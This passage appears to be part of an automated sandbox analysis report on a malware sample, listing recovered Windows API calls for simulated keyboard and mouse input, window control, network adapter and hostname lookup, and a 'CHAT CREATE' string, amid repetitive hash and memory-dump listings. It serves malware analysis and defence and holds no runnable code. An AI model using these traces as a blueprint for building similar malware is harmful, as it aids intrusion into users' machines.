                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 883850110-0
                                                                                                                                                                                                                                                      • Opcode ID: 14d9f0102edccd77b9f672c77a2969e39bce88967141998df9fc879381f07455
                                                                                                                                                                                                                                                      • Instruction ID: ba898672c03263d1d32ad627b9c1e0deaafb00e3c435e1c8e460b17607d3aaf7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14d9f0102edccd77b9f672c77a2969e39bce88967141998df9fc879381f07455
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C33116B2704535AFDB207F65BC8483BBA8CEB453A47D5093BF541C3310E6B98C9186AE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,76AF0F00), ref: 00415114
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(-00000005), ref: 00415209
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(-00000005), ref: 00415211
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,-00000005), ref: 00415220
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00415250
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00415261
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                      • String ID: http://
                                                                                                                                                                                                                                                      • API String ID: 805584807-1121587658
                                                                                                                                                                                                                                                      • Opcode ID: 6c7806ccabbd8fcc7ee7238832fd813b5b7c4b1b92c6720e6b48b731c2fd7ef9
                                                                                                                                                                                                                                                      • Instruction ID: bda494b76298140d12da1d84aad608d97d7fbce1a881ed08e858e6e482b803ec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c7806ccabbd8fcc7ee7238832fd813b5b7c4b1b92c6720e6b48b731c2fd7ef9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5941C631E04A55FFEB328A64CC487EFBBB1AB91314F1444A7C98592242C37C4AC6CB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,?,?,?,?,?,75D42B40), ref: 0041C067
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000200,004153D7,?), ref: 004172FA
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000021,004153D7,02040001), ref: 00417305
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000201,00000001,?), ref: 00417310
                                                                                                                                                                                                                                                        • Part of subcall function 004172D4: PostMessageA.USER32(004153D7,00000202,00000001,?), ref: 0041731B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,75D42B40,?,?,?,?,?,?,?,?,?,?,004215C9), ref: 0041C09F
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 0041C0A5
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(?,004215C9,?,?,?,75D42B40,?,?,?,?,?,?,?,?,?,?), ref: 0041C0B7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032,?,?,?,75D42B40,?,?,?,?,?,?,?,?,?,?,004215C9), ref: 0041C0BB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032,?,?,?,75D42B40,?,?,?,?,?,?,?,?,?,?,004215C9), ref: 0041C0C4
                                                                                                                                                                                                                                                      • SetCursorPos.USER32(?,?,?,?,?,75D42B40,?,?,?,?,?,?,?,?,?,?), ref: 0041C0CC
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetDesktopWindow.USER32 ref: 0041436A
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000), ref: 00414377
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000,?), ref: 00414381
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowTextA.USER32(00000000,0042A440), ref: 0041438F
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(00000000,00000001,?,?,?), ref: 00414401
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowPos.USER32(00000000,000000FF,?,00000000,00000000,00000000,00000040,?,?,?), ref: 0041441C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(00000000,00000001,?,?,?), ref: 00414425
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(00000000), ref: 00414432
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(00000000,?,?,?), ref: 0041443B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(00000000), ref: 0041443E
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(00000000,?,?,?), ref: 00414441
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(00000000), ref: 00414444
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(00000000,?,?,?), ref: 00414447
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: Sleep.KERNEL32(00000064,?,?,?), ref: 0041444B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(00000000,00000001,?,?,?), ref: 00414454
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetWindowRect.USER32(00000025,?), ref: 0041725B
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetClientRect.USER32(00000025,?), ref: 00417266
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetWindowInfo.USER32(00000025,?), ref: 00417271
                                                                                                                                                                                                                                                        • Part of subcall function 0041723B: GetWindow.USER32(00000025,00000005), ref: 0041729C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$FocusMessagePostRectSleep$CursorForegroundShow$ClientDesktopInfoText
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2348713440-0
                                                                                                                                                                                                                                                      • Opcode ID: 5a471075d71d43247140f0b3b8ab528cf1292858723f251d4d5d341eeea68240
                                                                                                                                                                                                                                                      • Instruction ID: 8d1f864990b006e87c7e47a02d893c60dad91602a936ac63b34a93652cf90b4e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a471075d71d43247140f0b3b8ab528cf1292858723f251d4d5d341eeea68240
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D11AF32900208FBDF11AFE0DC06ADE3F3AEF48310F104096FD146A191D67656A2DBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00405927
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00405976
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040599C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004059EB
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405A1B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1659193697-0
                                                                                                                                                                                                                                                      • Opcode ID: 7eb4fc7c4cff398a8127e18a8ebeb016428abaad0fb7e5a14e772a828084fa8e
                                                                                                                                                                                                                                                      • Instruction ID: 29111852331fc9f6b874d3848e252dbb7bd2cb62a335b53481466694710a7231
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7eb4fc7c4cff398a8127e18a8ebeb016428abaad0fb7e5a14e772a828084fa8e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C312B72504A11BBE710BB20AC06AAB7799EB05324F50083FF544B71C1EB7DAD55CAAD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168B8
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168DA
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: inet_addr.WS2_32(000001D8), ref: 004168ED
                                                                                                                                                                                                                                                      • gethostname.WS2_32(?,00000080), ref: 0041704F
                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00417065
                                                                                                                                                                                                                                                        • Part of subcall function 00416BF1: lstrlenA.KERNEL32(00459868,004170BD,00000001,?,?,?,76AF23A0), ref: 00416BFF
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004170BE
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • inet_ntoa.WS2_32(?), ref: 004170EC
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?,00417108,0042A774,?,TCP,?,00000000,?,?,?,?,?,?,76AF23A0), ref: 00416EDF
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F08
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F2F
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F58
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F7F
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416FA6
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416FCF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$lstrlen$AdaptersInfo$CountTickgethostbynamegethostnameinet_addrinet_ntoa
                                                                                                                                                                                                                                                      • String ID: TCP
                                                                                                                                                                                                                                                      • API String ID: 2422590998-617288268
                                                                                                                                                                                                                                                      • Opcode ID: e1602f64369b46a3807cfafc907e5879a1d62b839d2e3dace35d8ca8e897e3f8
                                                                                                                                                                                                                                                      • Instruction ID: b1e24fbc6d044a6cad89cbc1356073e7b4529d59893941b7878710fa553d88fd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1602f64369b46a3807cfafc907e5879a1d62b839d2e3dace35d8ca8e897e3f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4931E872944218AFDF21AFB4DC42DEA37B8AF08344F14043AFA11D2212DA39D9858765
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetStartupInfoA.KERNEL32(76AF0A60), ref: 004259A9
                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000800), ref: 00425A50
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00425AA9
                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00425AB7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileType$HandleInfoStartup
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2290155327-0
                                                                                                                                                                                                                                                      • Opcode ID: f8f63ec4bba8fd702233c63b22d656da169e2781094af63c60f0cb75cb52c619
                                                                                                                                                                                                                                                      • Instruction ID: d2a862219b93b2636bbf7e154969fd1a02f9e5da5015a8ccb00956fe4b263de6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f63ec4bba8fd702233c63b22d656da169e2781094af63c60f0cb75cb52c619
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD512771704A618FD7208F28EC857667BA0AB05335F99836BD4A2CB2E0E778D841C71A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0045A2D8,?,76AE8A60,00000000,?,00401F4A,?,?), ref: 0041A852
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0045A2D8,00000000,00401F4A,?,?), ref: 0041A86A
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041A898
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00000400,?,00000000), ref: 0041A8FA
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0041A903
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Filelstrlen$CloseCreateHandleRead
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3969191716-0
                                                                                                                                                                                                                                                      • Opcode ID: f1bc365878a1fba07598aae656edbd1a92688bd0fca3672f0b62f6462dadd13d
                                                                                                                                                                                                                                                      • Instruction ID: 70d8934ea1e1ab713b593232fcf5332bb3268c6813b75f36181d3b14db31b1a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1bc365878a1fba07598aae656edbd1a92688bd0fca3672f0b62f6462dadd13d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 542171B2900118BFDB20AB94DC41EEF777CEB04354F5001AAFB05E3150D6356EA69B7A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000190,?,76AF0F00), ref: 0041507B
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 004150A1
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004150A5
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 004150D3
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 004150FD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InputSend$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 240672775-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b81f98a793ce5abd1e9060f4b5e1a42909660d45532c886f336ca13e155e941
                                                                                                                                                                                                                                                      • Instruction ID: 9f290cfd91dfee7e366b78b15d6756e3afb169dd54bad8c08db7a4cfee71d3d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b81f98a793ce5abd1e9060f4b5e1a42909660d45532c886f336ca13e155e941
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79212FA2D4021CBBDB11ABD6EC8AEDFFFBCEF50314F100427F601B2160E264565987A6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004201D8
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 00420207
                                                                                                                                                                                                                                                        • Part of subcall function 0041411E: GetTickCount.KERNEL32 ref: 0041411E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountSleepTickwsprintf
                                                                                                                                                                                                                                                      • String ID: CHAT CREATE %s$d
                                                                                                                                                                                                                                                      • API String ID: 21340384-1393571586
                                                                                                                                                                                                                                                      • Opcode ID: 6ff5e123241310e84f5d937806fdfd97bc892e57cf58ef5ee357e48b1a968bb9
                                                                                                                                                                                                                                                      • Instruction ID: 9b9521ded8b57a1770c2347fc0122ac2a4d25d25d1d9837db78de688113ac97f
